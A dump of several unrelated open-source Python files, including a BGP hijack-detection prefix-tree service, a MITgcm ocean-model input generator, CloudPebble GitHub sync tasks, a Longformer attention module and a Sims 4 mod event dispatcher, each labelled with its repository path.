exchange=self.autoconf_exchange,
routing_key="update",
priority=4,
random=True,
)
self.ongoing_hijack_prefixes_queue = create_queue(
SERVICE_NAME,
exchange=self.autoignore_exchange,
routing_key="ongoing-hijack-prefixes",
priority=1,
random=True,
)
log.info("data worker initiated")
def get_consumers(self, Consumer: Consumer, channel: Connection) -> List[Consumer]:
return [
Consumer(
queues=[self.update_queue],
on_message=self.annotate_bgp_update,
prefetch_count=100,
accept=["ujson"],
),
Consumer(
queues=[self.hijack_ongoing_queue],
on_message=self.annotate_ongoing_hijack_updates,
prefetch_count=100,
accept=["ujson"],
),
Consumer(
queues=[self.mitigation_request_queue],
on_message=self.annotate_mitigation_request,
prefetch_count=100,
accept=["ujson", "json"],
),
Consumer(
queues=[self.unmitigation_request_queue],
on_message=self.annotate_unmitigation_request,
prefetch_count=100,
accept=["ujson", "json"],
),
Consumer(
queues=[self.pg_amq_update_queue],
on_message=self.annotate_stored_bgp_update,
prefetch_count=100,
accept=["ujson", "txtjson"],
),
Consumer(
queues=[self.stop_queue],
on_message=self.stop_consumer_loop,
prefetch_count=100,
accept=["ujson"],
),
Consumer(
queues=[self.autoconf_update_queue],
on_message=self.handle_autoconf_updates,
prefetch_count=100,
accept=["ujson"],
),
Consumer(
queues=[self.ongoing_hijack_prefixes_queue],
on_message=self.handle_ongoing_hijack_prefixes,
prefetch_count=100,
accept=["ujson"],
),
]
def find_prefix_node(self, prefix):
ip_version = get_ip_version(prefix)
prefix_node = None
shared_memory_locks["prefix_tree"].acquire()
if ip_version == "v4":
size = 32
else:
size = 128
# need to turn to pytricia tree since this means that the tree has changed due to re-configuration
if self.shared_memory_manager_dict["prefix_tree_recalculate"]:
self.prefix_tree[ip_version] = dict_to_pytricia(
self.shared_memory_manager_dict["prefix_tree"][ip_version], size
)
log.info("{} pytricia tree re-parsed from configuration".format(ip_version))
self.shared_memory_manager_dict["prefix_tree_recalculate"] = False
if prefix in self.prefix_tree[ip_version]:
prefix_node = self.prefix_tree[ip_version][prefix]
shared_memory_locks["prefix_tree"].release()
return prefix_node
def find_autoignore_prefix_node(self, prefix):
ip_version = get_ip_version(prefix)
prefix_node = None
shared_memory_locks["autoignore"].acquire()
if ip_version == "v4":
size = 32
else:
size = 128
# need to turn to pytricia tree since this means that the tree has changed due to re-configuration
if self.shared_memory_manager_dict["autoignore_recalculate"]:
self.autoignore_prefix_tree[ip_version] = dict_to_pytricia(
self.shared_memory_manager_dict["autoignore_prefix_tree"][ip_version],
size,
)
log.info(
"{} autoignore pytricia tree re-parsed from configuration".format(
ip_version
)
)
self.shared_memory_manager_dict["autoignore_recalculate"] = False
if prefix in self.autoignore_prefix_tree[ip_version]:
prefix_node = self.autoignore_prefix_tree[ip_version][prefix]
shared_memory_locks["autoignore"].release()
return prefix_node
def annotate_bgp_update(self, message: Dict) -> NoReturn:
"""
Callback function that annotates an incoming bgp update with the associated
configuration node (otherwise it discards it).
"""
message.ack()
bgp_update = message.payload
try:
prefix_node = self.find_prefix_node(bgp_update["prefix"])
if prefix_node:
bgp_update["prefix_node"] = prefix_node
self.producer.publish(
bgp_update,
exchange=self.update_exchange,
routing_key="update-with-prefix-node",
serializer="ujson",
)
# else:
# log.warning("unconfigured BGP update received '{}'".format(bgp_update))
except Exception:
log.exception("exception")
def annotate_stored_bgp_update(self, message: Dict) -> NoReturn:
"""
Callback function that annotates an incoming (stored) bgp update with the associated
configuration node (otherwise it discards it).
"""
message.ack()
bgp_update = message.payload
try:
prefix_node = self.find_prefix_node(bgp_update["prefix"])
if prefix_node:
bgp_update["prefix_node"] = prefix_node
self.producer.publish(
bgp_update,
exchange=self.update_exchange,
routing_key="stored-update-with-prefix-node",
serializer="ujson",
)
else:
log.warning(
"unconfigured stored BGP update received '{}'".format(bgp_update)
)
except Exception:
log.exception("exception")
def annotate_ongoing_hijack_updates(self, message: Dict) -> NoReturn:
"""
Callback function that annotates incoming ongoing hijack updates with the associated
configuration nodes (otherwise it discards them).
"""
message.ack()
bgp_updates = []
for bgp_update in message.payload:
try:
prefix_node = self.find_prefix_node(bgp_update["prefix"])
if prefix_node:
bgp_update["prefix_node"] = prefix_node
bgp_updates.append(bgp_update)
except Exception:
log.exception("exception")
self.producer.publish(
bgp_updates,
exchange=self.hijack_exchange,
routing_key="ongoing-with-prefix-node",
serializer="ujson",
)
def annotate_mitigation_request(self, message: Dict) -> NoReturn:
"""
Callback function that annotates incoming hijack mitigation requests with the associated
mitigation action/instruction (otherwise it discards them).
"""
message.ack()
mit_request = message.payload
try:
prefix_node = self.find_prefix_node(mit_request["prefix"])
if prefix_node:
annotated_mit_request = {}
# use the first best matching rule mitigation action;
# a prefix should not have different mitigation actions anyway
annotated_mit_request["hijack_info"] = mit_request
annotated_mit_request["mitigation_action"] = prefix_node["data"][
"confs"
][0]["mitigation"]
self.producer.publish(
annotated_mit_request,
exchange=self.mitigation_exchange,
routing_key="mitigate-with-action",
serializer="ujson",
)
except Exception:
log.exception("exception")
def annotate_unmitigation_request(self, message: Dict) -> NoReturn:
"""
Callback function that annotates incoming hijack unmitigation requests with the associated
unmitigation action/instruction (otherwise it discards them).
"""
message.ack()
unmit_request = message.payload
try:
prefix_node = self.find_prefix_node(unmit_request["prefix"])
if prefix_node:
annotated_unmit_request = {}
# use the first best matching rule mitigation action;
# a prefix should not have different mitigation actions anyway
annotated_unmit_request["hijack_info"] = unmit_request
annotated_unmit_request["mitigation_action"] = prefix_node["data"][
"confs"
][0]["mitigation"]
self.producer.publish(
annotated_unmit_request,
exchange=self.mitigation_exchange,
routing_key="unmitigate-with-action",
serializer="ujson",
)
except Exception:
log.exception("exception")
def handle_autoconf_updates(self, message: List) -> NoReturn:
"""
Callback function that filters incoming autoconf updates based on whether their
encoded information already exists in the configuration (prefixtree).
"""
message.ack()
bgp_updates = message.payload
if not isinstance(bgp_updates, list):
bgp_updates = [bgp_updates]
bgp_updates_to_send_to_conf = list()
delete_from_redis_without_sending_to_autoconf = set()
for bgp_update in bgp_updates:
# if you have seen the exact same update before, do nothing
if self.redis.get(bgp_update["key"]):
return
if self.redis.exists(
"autoconf-update-keys-to-process"
) and not self.redis.sismember(
"autoconf-update-keys-to-process", bgp_update["key"]
):
return
prefix_node = self.find_prefix_node(bgp_update["prefix"])
add_update = True
# small optimization: if prefix exist in prefix tree and we have an update for existing origin, discard it
# attention: subprefixes belong to existing prefix nodes, so the check should also account
# for exact prefix equality if it is to be deleted from the cache
if (
prefix_node
and bgp_update["prefix"] == prefix_node["prefix"]
and bgp_update["type"] == "A"
):
try:
as_path = bgp_update["path"]
origin = as_path[-1]
for conf in prefix_node["data"]["confs"]:
if origin in conf["origin_asns"]:
add_update = False
break
except Exception:
log.exception("exception")
add_update = False
if not add_update:
delete_from_redis_without_sending_to_autoconf.add(bgp_update["key"])
else:
bgp_updates_to_send_to_conf.append(bgp_update)
if self.redis.exists("autoconf-update-keys-to-process"):
redis_pipeline = self.redis.pipeline()
for bgp_update_key in delete_from_redis_without_sending_to_autoconf:
redis_pipeline.srem("autoconf-update-keys-to-process", bgp_update_key)
redis_pipeline.execute()
self.producer.publish(
bgp_updates_to_send_to_conf,
exchange=self.autoconf_exchange,
routing_key="filtered-update",
retry=True,
priority=4,
serializer="ujson",
)
def handle_ongoing_hijack_prefixes(self, message: Dict) -> NoReturn:
"""
Callback function that checks whether ongoing hijack prefixes match
an autoignore rule (included in the message).
"""
message.ack()
ongoing_hijacks_to_prefixes = message.payload["ongoing_hijacks_to_prefixes"]
autoignore_rule_key = message.payload["rule_key"]
hijacks_matching_rule = set()
for hijack_key in ongoing_hijacks_to_prefixes:
try:
autoignore_prefix_node = self.find_autoignore_prefix_node(
ongoing_hijacks_to_prefixes[hijack_key]
)
if (
autoignore_prefix_node
and autoignore_prefix_node["rule_key"] == autoignore_rule_key
):
hijacks_matching_rule.add(hijack_key)
except Exception:
log.exception("exception")
self.producer.publish(
{
"hijacks_matching_rule": list(hijacks_matching_rule),
"rule_key": autoignore_rule_key,
},
exchange=self.autoignore_exchange,
routing_key="hijacks-matching-rule",
retry=True,
priority=1,
serializer="ujson",
)
def stop_consumer_loop(self, message: Dict) -> NoReturn:
"""
Callback function that stop the current consumer loop
"""
message.ack()
self.should_stop = True
def main():
# initiate prefix tree service with REST
prefixTreeService = PrefixTree()
# try to get configuration upon start (it is OK if it fails, will get it from POST)
# (this is needed because service may restart while configuration is running)
try:
r = requests.get("http://{}:{}/config".format(CONFIGURATION_HOST, REST_PORT))
conf_res = configure_prefixtree(
r.json(), prefixTreeService.shared_memory_manager_dict
)
if not conf_res["success"]:
log.info(
"could not get configuration upon startup, will get via POST later"
)
except Exception:
log.info("could not get configuration upon startup, will get via POST later")
# start REST within main process
prefixTreeService.start_rest_app()
if __name__ == "__main__":
main()
|
verification/tutorial_barotropic_gyre/input/gendata.py
|
mitgcm/mitgcm
| 247 |
78740
|
<reponame>mitgcm/mitgcm
import numpy as np
from numpy import cos, sin, pi
Ho = 5000 # ocean depth in meters
nx = 62 # number of gridpoints in x-direction
ny = 62 # number of gridpoints in y-direction
xo = 0 # origin in x,y for ocean domain
yo = 0 # (i.e. southwestern corner of ocean domain)
dx = 20 # grid spacing in x (km)
dy = 20 # grid spacing in y (km)
xeast = xo + (nx-2)*dx # eastern extent of ocean domain
ynorth = yo + (ny-2)*dy # northern extent of ocean domain
# Flat bottom at z=-Ho
h = -Ho * np.ones((ny, nx))
# Walls (surrounding domain); generate bathymetry file
h[:, [0,-1]] = 0 # set ocean depth to zero at east and west walls
h[[0,-1], :] = 0 # set ocean depth to zero at south and north walls
# save as single-precision (float32) with big-endian byte ordering
h.astype('>f4').tofile('bathy.bin')
# Ocean domain extends from (xo,yo) to (xeast,ynorth)
# (i.e. the ocean spans nx-2, ny-2 grid cells)
# out-of-box-config: xo=yo=0, dx=dy=20 km, ocean extent (0,0)-(1200,1200) km
# model domain includes a land cell surrounding the ocean domain
# The full model domain cell centers are located at:
# XC[0,:] = -10, +10, ..., +1210 (km)
# YC[:,0] = -10, +10, ..., +1210 (km)
# and full model domain cell corners are located at:
# XG[0,:] = -20, 0, ..., 1200 [, 1220] (km)
# YG[:,0] = -20, 0, ..., 1200 [, 1220] (km)
# where the last value in brackets is not included in the MITgcm grid variable
# and reflects the eastern and northern edge of the model domain respectively.
# See section 2.11.4 of the MITgcm users manual.
# Zonal wind-stress, located at u-points (see section 2.11.4)
# here we non-dimensionalize: 0 at southern and western ocean boundary
# to 1.0 at eastern and northern ocean boundary
# for the purpose of applying sinusoidal-shaped wind stress curve
tauMax = 0.1 # wind stress maximum
x = (np.arange(nx)-1) / (nx-2) # x-coordinate, located at XG points
y = (np.arange(ny)-.5) / (ny-2) # y-coordinate, located at YC points
Y, X = np.meshgrid(y, x, indexing='ij')
tau = -tauMax * cos(Y*pi) # generate file for -cos(y) profile between 0-1200km
tau.astype('>f4').tofile('windx_cosy.bin')
tau = tauMax * sin(Y*pi) # generate file for +sin(y) profile between 0-1200km
tau.astype('>f4').tofile('windx_siny.bin')
# Meridional wind-stress, if desired, would be located at v-points (XC, YG)
|
ide/tasks/git.py
|
Ramonrlb/cloudpebble
| 147 |
78756
|
import base64
import urllib2
import json
import os
import logging
from celery import task
from django.conf import settings
from django.utils.timezone import now
from github.GithubObject import NotSet
from github import Github, GithubException, InputGitTreeElement
from ide.git import git_auth_check, get_github
from ide.models.build import BuildResult
from ide.models.project import Project
from ide.tasks import do_import_archive, run_compile
from ide.utils.git import git_sha, git_blob
from ide.utils.project import find_project_root_and_manifest, BaseProjectItem, InvalidProjectArchiveException
from ide.utils.sdk import generate_manifest_dict, generate_manifest, generate_wscript_file, manifest_name_for_project
from utils.td_helper import send_td_event
__author__ = 'katharine'
logger = logging.getLogger(__name__)
@task(acks_late=True)
def do_import_github(project_id, github_user, github_project, github_branch, delete_project=False):
try:
url = "https://github.com/%s/%s/archive/%s.zip" % (github_user, github_project, github_branch)
if file_exists(url):
u = urllib2.urlopen(url)
return do_import_archive(project_id, u.read())
else:
raise Exception("The branch '%s' does not exist." % github_branch)
except Exception as e:
try:
project = Project.objects.get(pk=project_id)
user = project.owner
except:
project = None
user = None
if delete_project and project is not None:
try:
project.delete()
except:
pass
send_td_event('cloudpebble_github_import_failed', data={
'data': {
'reason': e.message,
'github_user': github_user,
'github_project': github_project,
'github_branch': github_branch
}
}, user=user)
raise
def file_exists(url):
request = urllib2.Request(url)
request.get_method = lambda: 'HEAD'
try:
urllib2.urlopen(request)
except:
return False
else:
return True
@git_auth_check
def github_push(user, commit_message, repo_name, project):
g = Github(user.github.token, client_id=settings.GITHUB_CLIENT_ID, client_secret=settings.GITHUB_CLIENT_SECRET)
repo = g.get_repo(repo_name)
try:
branch = repo.get_branch(project.github_branch or repo.master_branch)
except GithubException:
raise Exception("Unable to get branch.")
commit = repo.get_git_commit(branch.commit.sha)
tree = repo.get_git_tree(commit.tree.sha, recursive=True)
next_tree = {x.path: InputGitTreeElement(path=x.path, mode=x.mode, type=x.type, sha=x.sha) for x in tree.tree}
try:
root, manifest_item = find_project_root_and_manifest([GitProjectItem(repo, x) for x in tree.tree])
except InvalidProjectArchiveException:
root = ''
manifest_item = None
expected_paths = set()
def update_expected_paths(new_path):
# This adds the path *and* its parent directories to the list of expected paths.
# The parent directories are already keys in next_tree, so if they aren't present in expected_paths
# then, when iterating over next_tree to see which files have been deleted, we would have to treat
# directories as special cases.
split_path = new_path.split('/')
expected_paths.update('/'.join(split_path[:p]) for p in range(2, len(split_path) + 1))
project_sources = project.source_files.all()
has_changed = False
for source in project_sources:
repo_path = os.path.join(root, source.project_path)
update_expected_paths(repo_path)
if repo_path not in next_tree:
has_changed = True
next_tree[repo_path] = InputGitTreeElement(path=repo_path, mode='100644', type='blob',
content=source.get_contents())
logger.debug("New file: %s", repo_path)
else:
sha = next_tree[repo_path]._InputGitTreeElement__sha
our_content = source.get_contents()
expected_sha = git_sha(our_content)
if expected_sha != sha:
logger.debug("Updated file: %s", repo_path)
next_tree[repo_path]._InputGitTreeElement__sha = NotSet
next_tree[repo_path]._InputGitTreeElement__content = our_content
has_changed = True
# Now try handling resource files.
resources = project.resources.all()
resource_root = project.resources_path
for res in resources:
for variant in res.variants.all():
repo_path = os.path.join(resource_root, variant.path)
update_expected_paths(repo_path)
if repo_path in next_tree:
content = variant.get_contents()
if git_sha(content) != next_tree[repo_path]._InputGitTreeElement__sha:
logger.debug("Changed resource: %s", repo_path)
has_changed = True
blob = repo.create_git_blob(base64.b64encode(content), 'base64')
logger.debug("Created blob %s", blob.sha)
next_tree[repo_path]._InputGitTreeElement__sha = blob.sha
else:
logger.debug("New resource: %s", repo_path)
has_changed = True
blob = repo.create_git_blob(base64.b64encode(variant.get_contents()), 'base64')
logger.debug("Created blob %s", blob.sha)
next_tree[repo_path] = InputGitTreeElement(path=repo_path, mode='100644', type='blob', sha=blob.sha)
# Manage deleted files
src_root = os.path.join(root, 'src')
worker_src_root = os.path.join(root, 'worker_src')
for path in next_tree.keys():
if not (any(path.startswith(root+'/') for root in (src_root, resource_root, worker_src_root))):
continue
if path not in expected_paths:
del next_tree[path]
logger.debug("Deleted file: %s", path)
has_changed = True
# Compare the resource dicts
remote_manifest_path = root + manifest_name_for_project(project)
remote_wscript_path = root + 'wscript'
if manifest_item:
their_manifest_dict = json.loads(manifest_item.read())
their_res_dict = their_manifest_dict.get('resources', their_manifest_dict.get('pebble', their_manifest_dict).get('resources', {'media': []}))
# If the manifest needs a new path (e.g. it is now package.json), delete the old one
if manifest_item.path != remote_manifest_path:
del next_tree[manifest_item.path]
else:
their_manifest_dict = {}
their_res_dict = {'media': []}
our_manifest_dict = generate_manifest_dict(project, resources)
our_res_dict = our_manifest_dict.get('resources', our_manifest_dict.get('pebble', our_manifest_dict).get('resources', {'media': []}))
if our_res_dict != their_res_dict:
logger.debug("Resources mismatch.")
has_changed = True
# Try removing things that we've deleted, if any
to_remove = set(x['file'] for x in their_res_dict['media']) - set(x['file'] for x in our_res_dict['media'])
for path in to_remove:
repo_path = resource_root + path
if repo_path in next_tree:
logger.debug("Deleted resource: %s", repo_path)
del next_tree[repo_path]
# This one is separate because there's more than just the resource map changing.
if their_manifest_dict != our_manifest_dict:
has_changed = True
if remote_manifest_path in next_tree:
next_tree[remote_manifest_path]._InputGitTreeElement__sha = NotSet
next_tree[remote_manifest_path]._InputGitTreeElement__content = generate_manifest(project, resources)
else:
next_tree[remote_manifest_path] = InputGitTreeElement(path=remote_manifest_path, mode='100644', type='blob',
content=generate_manifest(project, resources))
if project.project_type == 'native' and remote_wscript_path not in next_tree:
next_tree[remote_wscript_path] = InputGitTreeElement(path=remote_wscript_path, mode='100644', type='blob',
content=generate_wscript_file(project, True))
has_changed = True
# Commit the new tree.
if has_changed:
logger.debug("Has changed; committing")
# GitHub seems to choke if we pass the raw directory nodes off to it,
# so we delete those.
for x in next_tree.keys():
if next_tree[x]._InputGitTreeElement__mode == '040000':
del next_tree[x]
logger.debug("removing subtree node %s", x)
logger.debug([x._InputGitTreeElement__mode for x in next_tree.values()])
git_tree = repo.create_git_tree(next_tree.values())
logger.debug("Created tree %s", git_tree.sha)
git_commit = repo.create_git_commit(commit_message, git_tree, [commit])
logger.debug("Created commit %s", git_commit.sha)
git_ref = repo.get_git_ref('heads/%s' % (project.github_branch or repo.master_branch))
git_ref.edit(git_commit.sha)
logger.debug("Updated ref %s", git_ref.ref)
project.github_last_commit = git_commit.sha
project.github_last_sync = now()
project.save()
return True
send_td_event('cloudpebble_github_push', data={
'data': {
'repo': project.github_repo
}
}, user=user)
return False
def get_root_path(path):
path, extension = os.path.splitext(path)
return path.split('~', 1)[0] + extension
class GitProjectItem(BaseProjectItem):
def __init__(self, repo, tree_item):
self.repo = repo
self.git_item = tree_item
def read(self):
return git_blob(self.repo, self.git_item.sha)
@property
def path(self):
return self.git_item.path
@git_auth_check
def github_pull(user, project):
g = get_github(user)
repo_name = project.github_repo
if repo_name is None:
raise Exception("No GitHub repo defined.")
repo = g.get_repo(repo_name)
# If somehow we don't have a branch set, this will use the "master_branch"
branch_name = project.github_branch or repo.master_branch
try:
branch = repo.get_branch(branch_name)
except GithubException:
raise Exception("Unable to get the branch.")
if project.github_last_commit == branch.commit.sha:
# Nothing to do.
return False
commit = repo.get_git_commit(branch.commit.sha)
tree = repo.get_git_tree(commit.tree.sha, recursive=True)
paths = {x.path: x for x in tree.tree}
paths_notags = {get_root_path(x) for x in paths}
# First try finding the resource map so we don't fail out part-done later.
try:
root, manifest_item = find_project_root_and_manifest([GitProjectItem(repo, x) for x in tree.tree])
except ValueError as e:
raise ValueError("In manifest file: %s" % str(e))
resource_root = root + project.resources_path + '/'
manifest = json.loads(manifest_item.read())
media = manifest.get('resources', {}).get('media', [])
project_type = manifest.get('projectType', 'native')
for resource in media:
path = resource_root + resource['file']
if project_type == 'pebblejs' and resource['name'] in {
'MONO_FONT_14', 'IMAGE_MENU_ICON', 'IMAGE_LOGO_SPLASH', 'IMAGE_TILE_SPLASH'}:
continue
if path not in paths_notags:
raise Exception("Resource %s not found in repo." % path)
# Now we grab the zip.
zip_url = repo.get_archive_link('zipball', branch_name)
u = urllib2.urlopen(zip_url)
# And wipe the project!
# TODO: transaction support for file contents would be nice...
project.source_files.all().delete()
project.resources.all().delete()
# This must happen before do_import_archive or we'll stamp on its results.
project.github_last_commit = branch.commit.sha
project.github_last_sync = now()
project.save()
import_result = do_import_archive(project.id, u.read())
send_td_event('cloudpebble_github_pull', data={
'data': {
'repo': project.github_repo
}
}, user=user)
return import_result
@task
def do_github_push(project_id, commit_message):
project = Project.objects.select_related('owner__github').get(pk=project_id)
return github_push(project.owner, commit_message, project.github_repo, project)
@task
def do_github_pull(project_id):
project = Project.objects.select_related('owner__github').get(pk=project_id)
return github_pull(project.owner, project)
@task
def hooked_commit(project_id, target_commit):
project = Project.objects.select_related('owner__github').get(pk=project_id)
did_something = False
logger.debug("Comparing %s versus %s", project.github_last_commit, target_commit)
if project.github_last_commit != target_commit:
github_pull(project.owner, project)
did_something = True
if project.github_hook_build:
build = BuildResult.objects.create(project=project)
run_compile(build.id)
did_something = True
return did_something
|
lra_benchmarks/models/longformer/longformer_attention.py
|
guyd1995/long-range-arena
| 416 |
78779
|
<filename>lra_benchmarks/models/longformer/longformer_attention.py<gh_stars>100-1000
# Copyright 2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements Longformer's attention (https://arxiv.org/abs/2004.05150).
Like the current (8/28/20) Huggingface version, we do not support
dilated and autoregressive attention patterns as they require custom CUDA
kernels to be efficient. "Sliding window" and "global" attention patterns are
supported, however.
"""
from flax import nn
from jax import lax
import jax.numpy as jnp
import numpy as np
def _build_global_mask(mask):
"""Builds mask for global attention pattern.
Args:
mask: boolean jax array of shape `[batch_size, seq_len]`.
Returns:
mask, boolean jax array of shape `[batch_size, 1 (n_heads), seq_len,
seq_len]`.
"""
return jnp.logical_or(mask[:, jnp.newaxis, :, jnp.newaxis],
mask[:, jnp.newaxis, jnp.newaxis, :])
def _build_sliding_window_mask(window_size, global_mask):
"""Builds mask for sliding window pattern.
Args:
window_size: int, size of sliding window.
global_mask: boolean jax array of shape `[batch_size, seq_len]`.
Returns:
mask, boolean jax array of shape `[batch_size, 1 (n_heads), seq_len,
seq_len]`.
If `window_size` is odd, both left and right sides have the same receptive
field. Otherwise, the left side gets one more. Note - we need global mask
because
due to the symmetry requirement, non-global positions can still attend to
global positions.
"""
seq_len = global_mask.shape[1]
right_size = window_size // 2
left_size = window_size - right_size
left_mask = sum(np.eye(seq_len, k=-i) for i in range(left_size))
right_mask = sum(np.eye(seq_len, k=i) for i in range(1, right_size + 1))
mask = left_mask + right_mask
mask = jnp.array(mask[np.newaxis, np.newaxis, :, :]).astype(jnp.bool_)
return jnp.logical_or(mask, _build_global_mask(global_mask))
def _get_attention_result(query,
key,
value,
dtype,
precision,
dropout_rng,
dropout_rate,
broadcast_dropout,
deterministic,
mask=None,
padding_mask=None,
key_padding_mask=None,
segmentation=None,
key_segmentation=None,
apply_causal_mask=False):
"""Helper function returning `[batch_size, seq_len, heads, features]` output."""
# assumes query/key/value has shape `[batch_size, seq_len, heads, features]`.
mask_components = [] if mask is None else [mask]
seq_len = query.shape[1]
if apply_causal_mask:
causal_mask = jnp.array(
np.reshape(np.tri(seq_len, k=0),
[1, 1, seq_len, seq_len])).astype(jnp.bool_)
mask_components.append(causal_mask)
if padding_mask is not None:
if key_padding_mask is None:
key_padding_mask = padding_mask
padding_mask = nn.attention.make_padding_mask(
padding_mask_query=padding_mask,
padding_mask_key=key_padding_mask,
query_shape=query.shape,
key_shape=key.shape,
attention_axis=(1,))
mask_components.append(padding_mask)
if segmentation is not None:
if key_segmentation is None:
key_segmentation = segmentation
segmentation_mask = nn.attention.make_padding_mask(
padding_mask_query=segmentation,
padding_mask_key=key_segmentation,
query_shape=query.shape,
key_shape=key.shape,
attention_axis=(1,),
segmentation_mask=True)
mask_components.append(segmentation_mask)
if mask_components:
attention_mask = mask_components[0]
for component in mask_components[1:]:
attention_mask = jnp.logical_and(attention_mask, component)
# attention mask in the form of attention bias
attention_bias = lax.select(
attention_mask > 0,
jnp.full(attention_mask.shape, 0.).astype(dtype),
jnp.full(attention_mask.shape, -1e10).astype(dtype))
else:
attention_bias = None
return nn.attention.dot_product_attention(
query,
key,
value,
dtype=dtype,
axis=1,
bias=attention_bias,
precision=precision,
dropout_rng=dropout_rng,
dropout_rate=dropout_rate,
broadcast_dropout=broadcast_dropout,
deterministic=deterministic)
class LongformerAttention(nn.Module):
"""Module implementing Longformer attention."""
def apply(self,
inputs_q,
inputs_kv,
num_heads,
sliding_window_size=512,
global_mask=None,
causal_mask=False,
dtype=jnp.float32,
qkv_features=None,
out_features=None,
padding_mask=None,
key_padding_mask=None,
segmentation=None,
key_segmentation=None,
broadcast_dropout=True,
dropout_rng=None,
dropout_rate=0.,
deterministic=False,
precision=None,
kernel_init=nn.linear.default_kernel_init,
bias_init=nn.initializers.zeros,
bias=True):
"""Applies longformer multi-head dot product attention on the input data.
Args:
inputs_q: input queries of shape `[bs, seq_len, features]`.
inputs_kv: key/values of shape `[bs, seq_len, features]` or `None` for
self-attention, in which case key/values will be derived from inputs_q.
num_heads: number of attention heads (should divide number of features).
sliding_window_size: size of sliding window attention to use.
global_mask: boolean matrix of shape `[bs, seq_len]`, where `True`
indicates that the position is globally attended. By default, no global
attention is used.
causal_mask: If true, apply causal attention masking.
dtype: the dtype of the computation (default: float32).
qkv_features: dimension of the key, query, and value.
out_features: dimension of the last projection.
padding_mask: boolean specifying query tokens that are pad token.
key_padding_mask: boolean specifying key-value tokens that are pad token.
segmentation: segment indices for packed inputs_q data.
key_segmentation: segment indices for packed inputs_kv data.
broadcast_dropout: use a broadcasted dropout along batch dims.
dropout_rng: JAX PRNGKey to be use for dropout.
dropout_rate: dropout rate.
deterministic: if true, apply dropout, else don't.
precision: numerical precision of the computation.
kernel_init: initializer for the kernel of the Dense layers.
bias_init: initializer for the bias of the Dense layers.
bias: whether pointwise QKVO dense transforms use bias. query, key, value,
and returns output of shape `[bs, seq_len, num_heads, value_channels]`.
Returns:
output of shape `[bs, seq_len, features]`.
"""
if inputs_kv is None:
inputs_kv = inputs_q
batch_size = inputs_q.shape[0]
features = out_features or inputs_q.shape[-1]
qkv_features = qkv_features or inputs_q.shape[-1]
seq_len = inputs_q.shape[1]
assert qkv_features % num_heads == 0, (
'Memory dimension must be divisible by number of heads.')
head_dim = qkv_features // num_heads
dense = nn.DenseGeneral.partial(
axis=-1,
features=(num_heads, head_dim),
kernel_init=kernel_init,
bias_init=bias_init,
bias=bias,
precision=precision)
query_sw = dense(inputs_q, dtype=dtype, name='query_sliding_window')
key_sw = dense(inputs_kv, dtype=dtype, name='key_sliding_window')
value_sw = dense(inputs_kv, dtype=dtype, name='value_sliding_window')
query_global = dense(inputs_q, dtype=dtype, name='query_global')
key_global = dense(inputs_kv, dtype=dtype, name='key_global')
value_global = dense(inputs_kv, dtype=dtype, name='value_global')
if global_mask is None:
global_mask = jnp.full((batch_size, seq_len), False)
full_global_mask = _build_global_mask(global_mask)
sliding_window_mask = _build_sliding_window_mask(
window_size=sliding_window_size, global_mask=global_mask)
x_sw = _get_attention_result(
query=query_sw,
key=key_sw,
value=value_sw,
dtype=dtype,
precision=precision,
dropout_rng=dropout_rng,
dropout_rate=dropout_rate,
broadcast_dropout=broadcast_dropout,
deterministic=deterministic,
mask=sliding_window_mask,
padding_mask=padding_mask,
key_padding_mask=key_padding_mask,
segmentation=segmentation,
key_segmentation=key_segmentation,
apply_causal_mask=causal_mask)
x_global = _get_attention_result(
query=query_global,
key=key_global,
value=value_global,
dtype=dtype,
precision=precision,
dropout_rng=dropout_rng,
dropout_rate=dropout_rate,
broadcast_dropout=broadcast_dropout,
deterministic=deterministic,
mask=full_global_mask,
padding_mask=padding_mask,
key_padding_mask=key_padding_mask,
segmentation=segmentation,
key_segmentation=key_segmentation,
apply_causal_mask=causal_mask)
x = jnp.where(global_mask[:, :, jnp.newaxis, jnp.newaxis], x_global, x_sw)
# back to the original inputs dimensions
out = nn.DenseGeneral(
x,
features=features,
axis=(-2, -1),
kernel_init=kernel_init,
bias_init=bias_init,
bias=bias,
dtype=dtype,
precision=precision,
name='out')
return out
LongformerSelfAttention = LongformerAttention.partial(inputs_kv=None)
|
src/sims4communitylib/events/build_buy/common_build_buy_event_dispatcher.py
|
velocist/TS4CheatsInfo
| 118 |
78796
|
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Any
from sims4communitylib.events.build_buy.events.build_buy_enter import S4CLBuildBuyEnterEvent
from sims4communitylib.events.build_buy.events.build_buy_exit import S4CLBuildBuyExitEvent
from sims4communitylib.events.event_handling.common_event_registry import CommonEventRegistry
from sims4communitylib.modinfo import ModInfo
from sims4communitylib.services.common_service import CommonService
from sims4communitylib.utils.common_injection_utils import CommonInjectionUtils
from zone import Zone
class CommonBuildBuyEventDispatcherService(CommonService):
"""A service that dispatches Build/Buy events.
.. warning:: Do not use this service directly to listen for events!\
Use the :class:`.CommonEventRegistry` to listen for dispatched events.
"""
def _on_build_buy_enter(self, zone: Zone, *_, **__):
return CommonEventRegistry.get().dispatch(S4CLBuildBuyEnterEvent(zone))
def _on_build_buy_exit(self, zone: Zone, *_, **__):
return CommonEventRegistry.get().dispatch(S4CLBuildBuyExitEvent(zone))
@CommonInjectionUtils.inject_safely_into(ModInfo.get_identity(), Zone, Zone.on_build_buy_enter.__name__)
def _common_build_buy_enter(original, self, *args, **kwargs) -> Any:
result = original(self, *args, **kwargs)
CommonBuildBuyEventDispatcherService.get()._on_build_buy_enter(self, *args, **kwargs)
return result
@CommonInjectionUtils.inject_safely_into(ModInfo.get_identity(), Zone, Zone.on_build_buy_exit.__name__)
def _common_build_buy_exit(original, self, *args, **kwargs) -> Any:
result = original(self, *args, **kwargs)
CommonBuildBuyEventDispatcherService.get()._on_build_buy_exit(self, *args, **kwargs)
return result
|
RMQ/rmq.py
|
saneravi/ML_Stuff
| 209 |
78843
|
#!/usr/bin/env python
"""Solve the range minimum query problem."""
def read_numbers(number_file, query_file):
"""
Parameters
----------
number_file : str
query_file : str
Returns
-------
tuple
